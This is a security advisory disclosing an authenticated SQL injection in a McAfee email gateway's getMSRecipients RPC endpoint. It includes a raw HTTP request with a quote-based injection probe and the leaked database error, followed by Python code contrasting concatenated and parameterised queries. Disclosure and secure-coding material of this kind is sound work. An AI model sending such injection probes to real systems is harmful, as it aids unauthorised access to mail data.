McAfee EWS SIG 5.6 1741.115 - Authenticated SQL injection

Vulnerability Title: SQL injection - Authenticated

Vulnerable System:

  • McAfee EWS SIG 5.6 1741.115

Description:

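The application is vulnerable to SQL injection. The "start" field of the JSON body sent to the getMSRecipients RPC endpoint reaches the SQL query unescaped: a single quote in that value produces a database syntax error, which is returned in the response.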

Exploit:

Request:

POST /scmadmin/29836/cgi-bin/rpc/getMSRecipients/118 HTTP/1.1
Host: 10.10.10.113
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: text/plain; charset=UTF-8
Referer: https://10.10.10.113/scmadmin/29836/en_US/html/index.html
Content-Length: 35
Cookie: SCMUserSettings=%3Dnull%26popcheck%3D1%26lastUser%3Dscmadmin%26lang%3Den_US%26last_page_id%3Dmessage_search; SHOW_BANNER_NOTICE=BannerShown%3D1; ws_session=SID%3DSID%3AD911311E-E496-4807-800C-0790A40AF080
Pragma: no-cache
Cache-Control: no-cache

{"start":"O'","limit":15,"offset":0}

Response:

HTTP/1.1 200 OK
Date: Fri, 14 Dec 2012 01:25:16 GMT
Server: Apache/2.0.63 (Unix)
Vary: Accept-Encoding
Content-Length: 238
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=utf-8

[{"errorDesc":"ERROR:  unterminated quoted string at or near \"' group by lower(encodedaddr) order by lower(encodedaddr) limit 15\" at /opt/NETAwss/ui/www/scmadmin/cgi-bin/rpc line 701\n","errorCode":"1","errorContext":{},"jobId":"118"}]

Impact: Impact is low, because exploitation requires valid credentials.

Recommendation:

No response from McAfee to the submission.
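
The response above shows the quote from the "start" field reaching the SQL parser and the database error text being returned to the client. As an added example (not McAfee's code and not part of the original advisory), the code below contrasts string concatenation with a bound parameter and keeps database errors out of the reply. SQLite stands in for the appliance's database; the table name, the WHERE clause and all function names are assumptions, and only the encodedaddr column and the shape of the query tail come from the error text.

```python
import json
import sqlite3

# Constructed sample data. The table name "recipients" and the WHERE clause are
# assumptions; the GROUP BY / ORDER BY / LIMIT tail is modelled on the error text.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE recipients (encodedaddr TEXT)")
    db.executemany("INSERT INTO recipients VALUES (?)",
                   [("O'Brien@example.com",), ("oscar@example.com",), ("alice@example.com",)])
    return db

TAIL = " GROUP BY lower(encodedaddr) ORDER BY lower(encodedaddr) LIMIT ? OFFSET ?"

def search_concat(db, start, limit, offset):
    """Flawed pattern: the client-supplied prefix is pasted into the SQL text."""
    sql = ("SELECT lower(encodedaddr) FROM recipients "
           "WHERE lower(encodedaddr) LIKE lower('" + start + "%')" + TAIL)
    return [r[0] for r in db.execute(sql, (limit, offset))]

def search_bound(db, start, limit, offset):
    """Hardened pattern: the prefix is a bound parameter, never part of the SQL text."""
    # Escape LIKE wildcards so the value is matched literally as a prefix.
    esc = start.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = ("SELECT lower(encodedaddr) FROM recipients "
           "WHERE lower(encodedaddr) LIKE lower(?) ESCAPE '\\'" + TAIL)
    return [r[0] for r in db.execute(sql, (esc + "%", limit, offset))]

def handle_rpc(db, body, search):
    """Validate the JSON body, run the search, and keep database errors out of the reply."""
    try:
        req = json.loads(body)
        start, limit, offset = req["start"], req["limit"], req["offset"]
        if not isinstance(start, str) or type(limit) is not int or type(offset) is not int:
            raise ValueError("bad field type")
        if not (0 < limit <= 100 and offset >= 0):
            raise ValueError("bad paging values")
        return {"errorCode": "0", "rows": search(db, start, limit, offset)}
    except (ValueError, KeyError, TypeError):
        return {"errorCode": "1", "errorDesc": "invalid request"}
    except sqlite3.Error:
        # Log details server-side; the client gets a generic message only.
        return {"errorCode": "1", "errorDesc": "internal error"}
```

With the request body from the advisory, the concatenating search fails inside the database, while the bound-parameter search treats the quote as data and returns the matching address.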

© 2015 coma. All rights reserved.
Disclaimer: There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk.
In no event shall the author be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.